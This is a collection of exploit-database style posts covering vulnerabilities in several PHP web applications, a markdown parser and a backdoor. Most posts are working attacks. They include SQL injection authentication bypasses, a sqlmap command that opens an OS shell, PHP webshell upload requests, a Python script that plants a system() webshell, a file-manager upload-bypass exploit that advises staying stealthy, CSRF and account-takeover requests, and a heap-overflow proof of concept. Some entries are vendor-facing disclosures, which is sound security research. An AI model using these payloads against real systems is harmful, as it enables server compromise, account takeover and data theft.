<pre><code># Title: Bakery Shop Management System 1.0 - Blind Time SQLi To Rce<br /># Author: Hejap Zairy<br /># Date: 06.04.2022<br /># Vendor: https://www.campcodes.com/projects/php/simple-bakery-shop-management-system/<br /># Software: https://www.campcodes.com/wp-content/uploads/2022/02/bsms_0.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br /><br /># Steps<br /># 1.- Go to : https://0day.gov/bsms/login.php<br /># 2 - SQLi Authentication Bypass [admin'or 1=1 or ''=']<br /># 3 - SQLi To RCE r00t<br /># 4 - Ubload webshell <br /># 5 - Web Shell to meterpreter full tty shell<br /><br /><br />#vulnerability Code php<br /><br />---<br />```<br /> <?php<br /> $sql = "SELECT p.*,c.name as cname FROM `product_list` p inner join `category_list` c on p.category_id = c.category_id where p.status = 1 and p.delete_flag = 0 order by `name` asc";<br /> $qry = $conn->query($sql);<br /> while($row = $qry->fetch_assoc()):<br /> $stock_in = $conn->query("SELECT sum(quantity) as `total` FROM `stock_list` where unix_timestamp(CONCAT(`expiry_date`, ' 23:59:59')) >= unix_timestamp(CURRENT_TIMESTAMP) and product_id = '{$row['product_id']}' ")->fetch_array()['total'];<br /> $stock_out = $conn->query("SELECT sum(quantity) as `total` FROM `transaction_items` where product_id = '{$row['product_id']}' ")->fetch_array()['total'];<br /> $stock_in = $stock_in > 0 ? $stock_in : 0;<br /> $stock_out = $stock_out > 0 ? $stock_out : 0;<br /> $qty = $stock_in-$stock_out;<br /> $qty = $qty > 0 ? $qty : 0;<br />?><br />```<br />---<br />#Status: CRITICAL<br />[+] Payload POST<br /><br />---<br />POST /bsms/Actions.php?a=login HTTP/1.1<br />Host: 0day.gov<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: application/json, text/javascript, */*; q=0.01<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded; charset=UTF-8<br />X-Requested-With: XMLHttpRequest<br />Content-Length: 48<br />Origin: http://0day.gov<br />Connection: close<br />Referer: https://0day.gov/bsms/login.php<br />Cookie: PHPSESSID=ttdhr0ntd2dte05a2quob2kr3s<br /><br />username=admin'or+1%3D1+or+''%3D'&password=hejap<br />---<br /><br /><br /><br />---<br />Parameter: username (POST)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: username=admin'or 1=1 or ''='' AND (SELECT 1610 FROM (SELECT(SLEEP(515)))eFaV) AND '515'='515&password=hejap<br />---<br /><br />#Blind SQLi Time to Rce<br />#ُExploit <br /><br />sqlmap -r hejap_0day --dbs --time-sec=10 --threads=10 -D bsms_db -T user_list --dump --eta --technique=t --os-shell<br /><br /># Description:<br />The SQLi vulnerability We can use this information to construct an injection attack to bypass authentication.<br /><br /><br /># Proof and Exploit:<br />https://i.imgur.com/zR6Mekg.png<br />https://i.imgur.com/RQ1JXeK.png<br />https://i.imgur.com/0x9gepw.png<br /><br /></code></pre>
<pre><code>cmark-gfm: Integer overflow in table extension<br /><br />cmark-gfm (Github's markdown parsing library) is vulnerable to an out-of-bounds write when parsing markdown tables with a high number of columns due to an overflow of the 16bit columns count. <br /><br />Support for parsing tables in a github flavored markdown file is implemented in extensions/table.c. When a potential table is found, try_opening_table_header is called to parse the table header row (e.g | Column 1 | Column 2 |) and the delimiter/marker row (| - | :-|):<br /><br />```<br />static cmark_node *try_opening_table_header(cmark_syntax_extension *self,<br /> cmark_parser *parser,<br /> cmark_node *parent_container,<br /> unsigned char *input, int len) {<br /> <br /> ...<br /> // Since scan_table_start was successful, we must have a marker row.<br /> marker_row = row_from_string(self, parser,<br /> input + cmark_parser_get_first_nonspace(parser),<br /> len - cmark_parser_get_first_nonspace(parser));<br /> \u2026<br /> header_row = row_from_string(self, parser, (unsigned char *)parent_string,<br /> (int)strlen(parent_string));<br /> if (!header_row || header_row->n_columns != marker_row->n_columns) {<br /> free_table_row(parser->mem, marker_row);<br /> free_table_row(parser->mem, header_row);<br /> cmark_arena_pop();<br /> return parent_container;<br /> }<br /><br /> \u2026<br />```<br /><br />When both rows are parsed successfully, try_opening_table_header creates the alignments array to store alignment information for each column in the table:<br />```<br />uint8_t *alignments =<br /> (uint8_t *)parser->mem->calloc(header_row->n_columns, sizeof(uint8_t));<br /> cmark_llist *it = marker_row->cells;<br /> for (i = 0; it; it = it->next, ++i) {<br /> node_cell *node = (node_cell *)it->data;<br /> bool left = node->buf->ptr[0] == ':', right = node->buf->ptr[node->buf->size - 1] == ':';<br /><br /> if (left && right)<br /> alignments[i] = 'c';<br /> else if (left)<br /> alignments[i] = 'l';<br /> else if (right)<br /> alignments[i] = 'r';<br /> }<br />```<br /><br />The code uses the number of columns in the header row as the size of the array allocation, but loops through all columns in the marker row when filling the array. <br /><br />Normally, this isn't a problem as `header_row->n_columns == marker_row->n_columns` is checked earlier in the code. But, the check doesn't work when the real number of columns is larger than `2**16` as n_columns is defined as a uint16_t and row_from_string does not perform any checks to protect it from overflowing. <br />An attacker can simply create a header row with X columns, a marker row with `2**16+X` columns and trigger out-of-bounds writes at controlled offsets by setting the alignment of specific columns.<br /><br />Proof of Concept;<br />```<br />$ python3 -c 'print(\"|a|b|\<br />|-|-|\<br />|\"+ \"A\"*1380000 + \"|b|\<br />\<br />\<br />\"+\"|\" + \"a|\" * 2 + \"\<br />|\" + \":-|\" * (2**16+2) + \"\<br />|a|b|\")' > /tmp/test.md<br />$ ./src/cmark-gfm -e table /tmp/test.md<br />=================================================================<br />==2096092==ERROR: AddressSanitizer: heap-buffer-overflow on address 0x7f3aeaffd800 at pc 0x7f3affa99ca1 bp 0x7fffbb4d5390 sp 0x7fffbb4d5388<br />WRITE of size 1 at 0x7f3aeaffd800 thread T0<br /> #0 0x7f3affa99ca0 in try_opening_table_header /usr/local/google/home/fwilhelm/code/cmark-gfm/extensions/table.c:294<br /> #1 0x7f3affa99ca0 in try_opening_table_block /usr/local/google/home/fwilhelm/code/cmark-gfm/extensions/table.c:390<br /> #2 0x7f3aff9e536c in open_new_blocks /usr/local/google/home/fwilhelm/code/cmark-gfm/src/blocks.c:1286<br /> #3 0x7f3aff9e536c in S_process_line /usr/local/google/home/fwilhelm/code/cmark-gfm/src/blocks.c:1476<br /> #4 0x7f3aff9e6ea0 in S_parser_feed /usr/local/google/home/fwilhelm/code/cmark-gfm/src/blocks.c:730<br /> #5 0x7f3aff9e73fc in cmark_parser_feed /usr/local/google/home/fwilhelm/code/cmark-gfm/src/blocks.c:680<br /> #6 0x563777eaafe4 in main /usr/local/google/home/fwilhelm/code/cmark-gfm/src/main.c:281<br /> #7 0x7f3aff7fa7ec in __libc_start_main ../csu/libc-start.c:332<br /> #8 0x563777eaa2f9 in _start (/usr/local/google/home/fwilhelm/code/cmark-gfm/build/src/cmark-gfm+0x32f9)<br /><br />0x7f3aeaffd800 is located 0 bytes to the right of 9437184-byte region [0x7f3aea6fd800,0x7f3aeaffd800)<br />allocated by thread T0 here:<br /> #0 0x7f3affb58987 in __interceptor_calloc ../../../../src/libsanitizer/asan/asan_malloc_linux.cpp:154<br /> #1 0x7f3affa265a6 in alloc_arena_chunk /usr/local/google/home/fwilhelm/code/cmark-gfm/src/arena.c:19<br /> #2 0x7f3affa267a8 in arena_calloc /usr/local/google/home/fwilhelm/code/cmark-gfm/src/arena.c:76<br /> #3 0x7f3affa26a06 in cmark_llist_append /usr/local/google/home/fwilhelm/code/cmark-gfm/src/linked_list.c:7<br /> #4 0x7f3affa99204 in row_from_string /usr/local/google/home/fwilhelm/code/cmark-gfm/extensions/table.c:165<br /> #5 0x7f3affa995cc in try_opening_table_header /usr/local/google/home/fwilhelm/code/cmark-gfm/extensions/table.c:241<br /> #6 0x7f3affa995cc in try_opening_table_block /usr/local/google/home/fwilhelm/code/cmark-gfm/extensions/table.c:390<br /> #7 0x7f3aff9e536c in open_new_blocks /usr/local/google/home/fwilhelm/code/cmark-gfm/src/blocks.c:1286<br /> #8 0x7f3aff9e536c in S_process_line /usr/local/google/home/fwilhelm/code/cmark-gfm/src/blocks.c:1476<br /> #9 0x7f3aff9e6ea0 in S_parser_feed /usr/local/google/home/fwilhelm/code/cmark-gfm/src/blocks.c:730<br /> #10 0x7f3aff9e73fc in cmark_parser_feed /usr/local/google/home/fwilhelm/code/cmark-gfm/src/blocks.c:680<br /> #11 0x563777eaafe4 in main /usr/local/google/home/fwilhelm/code/cmark-gfm/src/main.c:281<br /> #12 0x7f3aff7fa7ec in __libc_start_main ../csu/libc-start.c:332<br /><br />SUMMARY: AddressSanitizer: heap-buffer-overflow /usr/local/google/home/fwilhelm/code/cmark-gfm/extensions/table.c:294 in try_opening_table_header<br />Shadow bytes around the buggy address:<br /> 0x0fe7dd5f7ab0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br /> 0x0fe7dd5f7ac0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br /> 0x0fe7dd5f7ad0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br /> 0x0fe7dd5f7ae0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br /> 0x0fe7dd5f7af0: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00<br />=>0x0fe7dd5f7b00:[fa]fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa<br /> 0x0fe7dd5f7b10: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa<br /> 0x0fe7dd5f7b20: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa<br /> 0x0fe7dd5f7b30: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa<br /> 0x0fe7dd5f7b40: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa<br /> 0x0fe7dd5f7b50: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa<br />Shadow byte legend (one shadow byte represents 8 application bytes):<br /> Addressable: 00<br /> Partially addressable: 01 02 03 04 05 06 07<br /> Heap left redzone: fa<br /> Freed heap region: fd<br /> Stack left redzone: f1<br /> Stack mid redzone: f2<br /> Stack right redzone: f3<br /> Stack after return: f5<br /> Stack use after scope: f8<br /> Global redzone: f9<br /> Global init order: f6<br /> Poisoned by user: f7<br /> Container overflow: fc<br /> Array cookie: ac<br /> Intra object redzone: bb<br /> ASan internal: fe<br /> Left alloca redzone: ca<br /> Right alloca redzone: cb<br /> Shadow gap: cc<br />==2096092==ABORTING<br />```<br /><br />(The first table is used to fill the arena allocator and trigger a clean crash report from ASAN. It's not required to trigger the bug)<br /><br />This bug is subject to a 90-day disclosure deadline. If a fix for this issue is made available to users before the end of the 90-day deadline, this bug report will become public 30 days after the fix was made available. Otherwise, this bug report will become public at the deadline. The scheduled deadline is 2022-05-16. For more details, see the Project Zero vulnerability disclosure policy: https://googleprojectzero.blogspot.com/p/vulnerability-disclosure-policy.html<br /><br />Related CVE Numbers: CVE-2022-24724.<br /><br /><br /><br />Found by: fwilhelm@google.com<br /><br /></code></pre>
<pre><code># Title: SAP Information System 1.0 Shell Upload<br /># Author: Hejap Zairy<br /># Date: 05.04.2022<br /># Vendor: https://www.sourcecodester.com/php/15262/sap-information-system-using-phppdo-oop.html<br /># Software: https://www.sourcecodester.com/sites/default/files/download/oretnom23/SAP_Information_System.zip<br /># Reference: https://github.com/Matrix07ksa<br /># Tested on: Windows, MySQL, Apache<br /><br />registered user can bypass waf upload .php.jpg files in attachments section with use of intercept tool in burbsuite to edit the raw<br /><br /><br />#vulnerability Code php<br />Needs more filtering to upload profile files<br /><br />```<br /> <script><br /> $(document).ready(function() { <br /> load_data(); <br /> var count = 1; <br /> function load_data() {<br /> $(document).on('click', '.edit-image', function() {<br /> var beneficiaries_id = $(this).data("image");<br /> get_image(beneficiaries_id); //argument <br /> <br /> });<br /> }<br /> function get_image(beneficiaries_id) {<br /> $.ajax({<br /> type: 'POST',<br /> url: 'fetch_row/beneficiaries_row.php',<br /> data: {<br /> beneficiaries_id: beneficiaries_id<br /> },<br /> dataType: 'json',<br /> success: function(response3) {<br /> $('#img_beneficiariesid').val(response3.beneficiaries_id);<br /> $('#img_imageprofile').attr("src", '../../'+ response3.image_profile.slice(0));//image<br /><br /> }<br /> });<br /> }<br /> });<br /> </script><br />```<br /><br /><br />[+] Payload POST<br /><br /><br />```<br />POST /SAP_Information_System/controllers/edit_householdImage.php HTTP/1.1<br />Host: 0day.gov<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: */*<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />X-Requested-With: XMLHttpRequest<br />Content-Type: multipart/form-data; boundary=---------------------------3440160751499277351272200964<br />Content-Length: 1343<br />Origin: http://0day.gov<br />Connection: close<br />Referer: http://0day.gov/SAP_Information_System/Dashboard/pages/Beneficiaries.php<br />Cookie: PHPSESSID=rcumpt42s3tngl4b74i4ndrpl9<br />-----------------------------3440160751499277351272200964<br /><br />Content-Disposition: form-data; name="image_profile"; filename="0day_hejap.png.php"<br /><br />Content-Type: image/jpg<br /><br /><?=`$_GET[515]`?><br />-----------------------------3440160751499277351272200964<br />Content-Disposition: form-data; name="beneficiaries_id"<br />5<br />-----------------------------3440160751499277351272200964--<br />```<br /><br /><br />#Status: CRITICAL<br /><br />[+] Payload GET<br /><br />```<br />GET /SAP_Information_System/Uploads/0day_Hejap.php?515=echo+Hejap+Zairy HTTP/1.1<br />Host: 0day.gov<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Connection: close<br />Upgrade-Insecure-Requests: 1<br />```<br /><br />#Response <br />```<br />HTTP/1.1 200 OK<br />Date: Tue, 05 Apr 2022 17:56:20 GMT<br />Server: Apache/2.4.52 (Win64) OpenSSL/1.1.1m PHP/7.4.27<br />X-Powered-By: PHP/7.4.27<br />Content-Length: 12<br />Connection: close<br />Content-Type: text/html; charset=UTF-8<br /><br />Hejap Zairy<br />```<br /><br /><br /># Description:<br />The file upload bypass WAF vulnerability occurs when the user uploads an executable script file, and through the script file to obtain the ability to execute server-side commands. This attack is the most direct and effective, sometimes having almost no technical barriers.<br /><br /><br /># Proof and Exploit:<br />https://i.imgur.com/65biZn6.png<br />https://i.imgur.com/kNOA8dT.png<br />https://i.imgur.com/LMlTPww.png<br /></code></pre>
<pre><code># Exploit Title: Multi Store Inventory Management System - Account Takeover (Unauthenticated)<br /># Date: 04/04/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.bdtask.com/<br /># Software Link: https://www.campcodes.com/projects/php/complete-multi-store-inventory-management-system-in-php-mysql/<br /># Version: 1.0<br /># Tested on: XAMPP, Windows 10<br /># Contact: https://twitter.com/dmaral3noz<br /><br /># Description :<br /><br />An attacker can takeover any registered 'Staff' user account by just sending below POST request<br />By changing the the "id", "email", "password" , "firstname" and "lastname" parameters<br /><br /><br />#Steps to Reproduce :<br /><br />1. Send the below POST request by changing "id", "email", "password" parameters.<br /><br />2. Log in to the user account by changed email and password.<br /><br /><br />################################################<br /><br /><br />POST /multistore_demo/dashboard/home/setting HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: multipart/form-data; boundary=---------------------------246162487211952414471071914687<br />Content-Length: 1645<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/multistore_demo/dashboard/home/setting<br />Cookie: ci_session=31504fa8fdcd43505beff1b210056ec12d5d8405<br />Upgrade-Insecure-Requests: 1<br /><br />-----------------------------246162487211952414471071914687<br />Content-Disposition: form-data; name="id"<br /><br />1<br />-----------------------------246162487211952414471071914687<br />Content-Disposition: form-data; name="firstname"<br /><br />saud<br />-----------------------------246162487211952414471071914687<br />Content-Disposition: form-data; name="lastname"<br /><br />test<br />-----------------------------246162487211952414471071914687<br />Content-Disposition: form-data; name="email"<br /><br />s3od@hi.com<br />-----------------------------246162487211952414471071914687<br />Content-Disposition: form-data; name="password"<br /><br />admin123<br />-----------------------------246162487211952414471071914687<br />Content-Disposition: form-data; name="about"<br /><br /><br />-----------------------------246162487211952414471071914687<br />Content-Disposition: form-data; name="old_image"<br /><br /><br />-----------------------------246162487211952414471071914687<br />Content-Disposition: form-data; name="image"; filename=""<br />Content-Type: application/octet-stream<br /><br /><br />-----------------------------246162487211952414471071914687--<br /></code></pre>
<pre><code># Exploit Title: Multi Store Inventory Management System - Information Disclosure<br /># Date: 04/04/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.bdtask.com/<br /># Software Link: https://www.campcodes.com/projects/php/complete-multi-store-inventory-management-system-in-php-mysql/<br /># Version: 1.0<br /># Tested on: XAMPP, Windows 10<br /># Contact: https://twitter.com/dmaral3noz<br /><br /># Description :<br /><br />The application allows directory listing and information disclosure of<br />some sensitive files that can allow an attacker to leverage the disclosed<br />information.<br /><br /><br />################################################<br /><br />PoC Html :<br /><br /><html><br /><head><body><br /><title>Multi Store Inventory Management System - Information Disclosure</title><br /><iframe<br />src=http://127.0.0.1/multistore_demo/install/sql/install.sql><br /></body></head><br /><html><br /></code></pre>
<pre><code># Exploit Title: Online Banquet Booking System - 'change admin credentials' Cross-Site Request Forgery (CSRF)<br /># Date: 04/04/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://phpgurukul.com<br /># Software Link: https://phpgurukul.com/online-banquet-booking-system-using-php-and-mysql/<br /># Version: 1.0<br /># Tested on: XAMPP, Linux<br /># Contact: https://twitter.com/dmaral3noz<br /><br /># Description :<br /><br />The application is not using any security token to prevent it against CSRF. Therefore, malicious user can change admin credentials by using crafted post request.<br /><br /><br /># HTTPS Request :<br /><br />POST /obbs/admin/admin-profile.php HTTP/1.1<br />Host: localhost<br />User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8<br />Accept-Language: en-US,en;q=0.5<br />Accept-Encoding: gzip, deflate<br />Content-Type: application/x-www-form-urlencoded<br />Content-Length: 86<br />Origin: http://localhost<br />Connection: close<br />Referer: http://localhost/obbs/admin/admin-profile.php<br />Cookie: PHPSESSID=5lotcnigq4mddq3rr6tnnlvn3e<br />Upgrade-Insecure-Requests: 1<br /><br />adminname=Admin&username=admin&email=admin%40gmail.com&mobilenumber=5689784589&submit=<br /><br /><br /># Poc Html :<br /><br /><html><br /> <!-- CSRF PoC - Saud --><br /> <body><br /> <script>history.pushState('', '', '/')</script><br /> <form action="http://localhost/obbs/admin/admin-profile.php" method="POST"><br /> <input type="hidden" name="adminname" value="Admin" /><br /> <input type="hidden" name="username" value="admin" /><br /> <input type="hidden" name="email" value="admin@gmail.com" /><br /> <input type="hidden" name="mobilenumber" value="123" /><br /> <input type="hidden" name="submit" value="" /><br /> <input type="submit" value="Submit request" /><br /> </form><br /> </body><br /></html><br /></code></pre>
<pre><code># Exploit Title: Gadget Store Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)<br /># Date: 04/04/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.campcodes.com/<br /># Software Link: https://www.campcodes.com/projects/php/gadget-store-management-system/<br /># Version: 1.0<br /># Tested on: XAMPP, Linux<br /># Contact: https://twitter.com/dmaral3noz<br /><br /><br /><br />*- url "http://localhost:80/gadgetsdb/addproduct.php"<br />*- Path File : http://localhost/gadgetsdb/upload/shell.php<br /><br />---------------------------------------------------<br /><br /><br />#!/bin/env python3<br />import requests<br /><br />print ('''<br />#################################################################################################### <br /># Gadget Store Management System 1.0 - Remote Code Execution (Unauthenticated) #<br /># BY:Saud Alenazi #<br /># 0xSaudi #<br />####################################################################################################<br />''')<br /><br />url = "http://localhost:80/gadgetsdb/addproduct.php"<br /><br />saud0 = {"User-Agent": "Mozilla/5.0 (X11; Linux x86_64; rv:78.0) Gecko/20100101 Firefox/78.0", "Accept": "text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8", "Accept-Language": "en-US,en;q=0.5", "Accept-Encoding": "gzip, deflate", "Content-Type": "multipart/form-data; boundary=---------------------------4587377838466971711694098865", "Origin": "http://localhost", "Connection": "close", "Referer": "http://localhost/gadgetsdb/product.php", "Upgrade-Insecure-Requests": "1"}<br />saud1 = "-----------------------------4587377838466971711694098865\r\nContent-Disposition: form-data; name=\"pname\"\r\n\r\ntest\r\n-----------------------------4587377838466971711694098865\r\nContent-Disposition: form-data; name=\"category\"\r\n\r\n4\r\n-----------------------------4587377838466971711694098865\r\nContent-Disposition: form-data; name=\"price\"\r\n\r\n100\r\n-----------------------------4587377838466971711694098865\r\nContent-Disposition: form-data; name=\"photo\"; filename=\"shell.php\"\r\nContent-Type: application/x-php\r\n\r\n<?php\r\nif($_REQUEST['s']) {\r\n system($_REQUEST['s']);\r\n } else phpinfo();\r\n?>\r\n</pre>\r\n</body>\r\n</html>\r\n-----------------------------4587377838466971711694098865--\r\n"<br />requests.post(url, headers=saud0, data=saud1)<br /><br /></code></pre>
<pre><code># Exploit Title: Roxy File Manager 1.4.5 PHP File Upload Restriction Bypass<br /># Exploit Author: Adam Shebani (NULLHE4D)<br /># Date: 07/03/2022<br /># Software: Roxy File Manager<br /># Version: 1.4.5<br /># CVE: CVE-2018-20525<br /># Vendor Homepage: http://www.roxyfileman.com/<br /># Software Link: http://www.roxyfileman.com/download.php?f=1.4.5-php<br /># Tested on: PHP 7.2 on Ubuntu 20.04 LTS and PHP 7.4 on Windows 10<br /><br /><br /># Roxy File Manager 1.4.5 restricts uploading files with certain<br /># extensions, including various PHP extensions. These forbidden<br /># extensions are configured in a file called 'conf.json' at the root<br /># of the file manager's code base. Sections #1 and #1.1 at<br /># https://www.exploit-db.com/exploits/46085 demonstrate a directory<br /># traversal vulnerability that allows exfiltrating arbitrary<br /># directories by copying them to a directory accessible through the<br /># file manager's web interface. The same vulnerability can be used<br /># to overwrite the 'conf.json' file by copying a directory<br /># containing a modified configuration file that has been uploaded.<br /># The directory must have the same name as the original<br /># configuration file's parent directory (usually 'fileman'). The<br /># source and destination directories will be merged and files from<br /># the destination directory get overwritten by the ones from the<br /># source if they have the same name.<br /><br /><br />import argparse, requests, json, re<br />from urllib.parse import urlparse, quote_plus<br />from random import randint<br />#from os import remove<br />from os.path import isfile<br /><br /><br />def failure():<br /> print("[*] it is advised to manually cleanup any files/directories created on the target by this exploit")<br /> exit(1)<br /><br /><br />argparser = argparse.ArgumentParser()<br />argparser.add_argument("-u", "--url", type=str, action="store", help="The URL to the target Roxy File Manager instance (e.g. http://localhost/fileman/)", required=True)<br />argparser.add_argument("-f", "--file", type=str, action="store", help="The PHP file to upload (e.g. shell.php)", required=True)<br />args = argparser.parse_args()<br /><br />roxy_url = args.url<br />php_file = args.file<br />if not isfile(php_file):<br /> print("[-] specified PHP file not found")<br /> exit(1)<br /><br />user_agent = "Mozilla/5.0 (Windows NT 6.4; rv:75.0.0) Gecko/20100101 Firefox/75.0.0"<br />headers = {"User-Agent": user_agent}<br />form_headers = {"User-Agent": user_agent, "Content-Type": "application/x-www-form-urlencoded"}<br />roxy_url += "" if roxy_url.endswith("/") else "/"<br />roxy_hostname = urlparse(roxy_url).hostname<br />uploads_path = urlparse(roxy_url).path + "Uploads"<br /><br /><br /># verify Roxy File Manager instance<br />res = requests.get(roxy_url, headers=headers, allow_redirects=False)<br />if res.status_code == 200 and "<title>Roxy file manager</title>" in res.text:<br /> print("[+] verified Roxy File Manager instance at " + roxy_url)<br />else:<br /> print("[-] couldn't find a Roxy File Manager instance at the specified URL")<br /> exit(1)<br /><br /><br /># get conf.json<br />url = roxy_url + "conf.json"<br />res = requests.get(url, headers=headers)<br />if res.status_code == 200:<br /> orig_conf = res.text<br /> orig_conf_json = json.loads(orig_conf)<br /> extensions = orig_conf_json["FORBIDDEN_UPLOADS"].split()<br /> if not "php" in extensions:<br /> print("[*] PHP files are already not forbidden from being uploaded")<br /> exit(0)<br />else:<br /> print("[-] couldn't find conf.json")<br /> exit(1)<br /><br /><br /># verify directory traversal vulnerability in fileslist<br />url = roxy_url + "php/fileslist.php"<br />body = "d={}&type=".format(quote_plus(uploads_path+"/.."))<br />res = requests.post(url, headers=form_headers, data=body)<br />res_json = json.loads(res.text)<br />if res.status_code == 200 and len(res_json) > 0 and "conf.json" in res.text:<br /> print("[+] verified directory traversal vulnerability in fileslist")<br />else:<br /> print("[-] couldn't verify directory traversal vulnerability in fileslist")<br /> exit(1)<br /><br /><br /># create fileman directory structure<br />url = roxy_url + "php/createdir.php"<br />random_dirname = "".join([str(randint(0,9)) for i in range(10)])<br />body = "d={}&n={}".format(quote_plus(uploads_path), random_dirname)<br />res = requests.post(url, headers=form_headers, data=body)<br />if not '"res":"ok"' in res.text:<br /> print("[-] failed to create fileman directory structure")<br /> exit(1)<br />tmp_path = uploads_path + "/" + random_dirname<br /><br />body = "d={}&n={}".format(quote_plus(tmp_path), "fileman")<br />res = requests.post(url, headers=form_headers, data=body)<br />if not '"res":"ok"' in res.text:<br /> print("[-] failed to create fileman directory structure")<br /> failure()<br />fileman_path = tmp_path + "/fileman"<br /><br /><br /># upload modified conf.json<br />url = roxy_url + "php/upload.php"<br />modified_conf = re.sub("\sphp\s", " ", orig_conf)<br />with open("conf.json", "w") as conf_file:<br /> conf_file.write(modified_conf)<br />body = {"action": (None, "upload"), "method": (None, "ajax"), "d": (None, fileman_path), "files[]": open("conf.json", "rb")}<br />res = requests.post(url, headers=headers, files=body)<br />#remove("conf.json")<br />if '"res":"ok"' in res.text:<br /> print("[+] created fileman directory structure with modified conf.json")<br />else:<br /> print("[-] failed to upload modified conf.json")<br /> failure()<br /><br /><br /># overwrite server conf.json with copydir directory traversal vulnerability<br />url = roxy_url + "php/copydir.php"<br />body = "d={}&n={}".format(quote_plus(fileman_path), quote_plus(uploads_path+"/../.."))<br />res = requests.post(url, headers=form_headers, data=body)<br />if '"res":"ok"' in res.text:<br /> print("[+] overwritten server conf.json using copydir directory traversal")<br />else:<br /> print("[-] failed to overwrite server conf.json using copydir directory traversal")<br /> failure()<br /><br /><br /># upload php file<br />url = roxy_url + "php/upload.php"<br />body = {"action": (None, "upload"), "method": (None, "ajax"), "d": (None, tmp_path), "files[]": open(php_file, "rb")}<br />res = requests.post(url, headers=headers, files=body)<br />if '"res":"ok"' in res.text:<br /> print("[+] successfully uploaded PHP file")<br /> print("[*] you can manually request the file at: " + "/".join(roxy_url.split("/")[:3]) + tmp_path + "/" + php_file)<br /> print("[*] don't forget to delete this as well as it's containing directory using the file manager if you wanna be stealthy")<br />else:<br /> print("[-] failed to upload PHP file")<br /> failure()<br /><br /><br /># restore original conf.json and cleanup unwanted files/dirs<br />url = roxy_url + "php/deletefile.php"<br />body = "f=" + quote_plus(fileman_path+"/conf.json")<br />res = requests.post(url, headers=form_headers, data=body)<br />if not '"res":"ok"' in res.text:<br /> print("[-] failed to cleanup")<br /> failure()<br /><br />url = roxy_url + "php/upload.php"<br />with open("conf.json", "w") as conf_file:<br /> conf_file.write(orig_conf)<br />body = {"action": (None, "upload"), "method": (None, "ajax"), "d": (None, fileman_path), "files[]": open("conf.json", "rb")}<br />res = requests.post(url, headers=headers, files=body)<br />#remove("conf.json")<br />if not '"res":"ok"' in res.text:<br /> print("[-] failed to cleanup")<br /> failure()<br /><br />url = roxy_url + "php/copydir.php"<br />body = "d={}&n={}".format(quote_plus(fileman_path), quote_plus(uploads_path+"/../.."))<br />res = requests.post(url, headers=form_headers, data=body)<br />if '"res":"ok"' in res.text:<br /> print("[+] original conf.json restored")<br />else:<br /> print("[-] failed to cleanup")<br /> failure()<br /><br />url = roxy_url + "php/deletefile.php"<br />body = "f=" + quote_plus(fileman_path+"/conf.json")<br />res = requests.post(url, headers=form_headers, data=body)<br />if not '"res":"ok"' in res.text:<br /> print("[-] failed to cleanup")<br /> failure()<br /><br />url = roxy_url + "php/deletedir.php?d=" + quote_plus(fileman_path)<br />res = requests.get(url, headers=headers)<br />if '"res":"ok"' in res.text:<br /> print("[+] cleanup finished successfully")<br />else:<br /> print("[-] failed to cleanup")<br /> failure()<br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/cf3c08afa6c2d49ba36ed0f895893d71.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Delf.ps<br />Vulnerability: Information Disclosure<br />Description: The malware listens on TCP port 80. Third-party adversaries who can reach an infected host can generate and download screenshots of the systems desktop.<br />Family: Delf<br />Type: PE32<br />MD5: cf3c08afa6c2d49ba36ed0f895893d71<br />Vuln ID: MVID-2022-0532<br />Disclosure: 04/02/2022<br /><br />Exploit/PoC:<br />C:\>curl http://x.x.x.x:80 > screenshot.jpg<br /> % Total % Received % Xferd Average Speed Time Time Time Current<br /> Dload Upload Total Spent Left Speed<br />100 280k 0 280k 0 0 280k 0 --:--:-- --:--:-- --:--:-- 2577k<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability 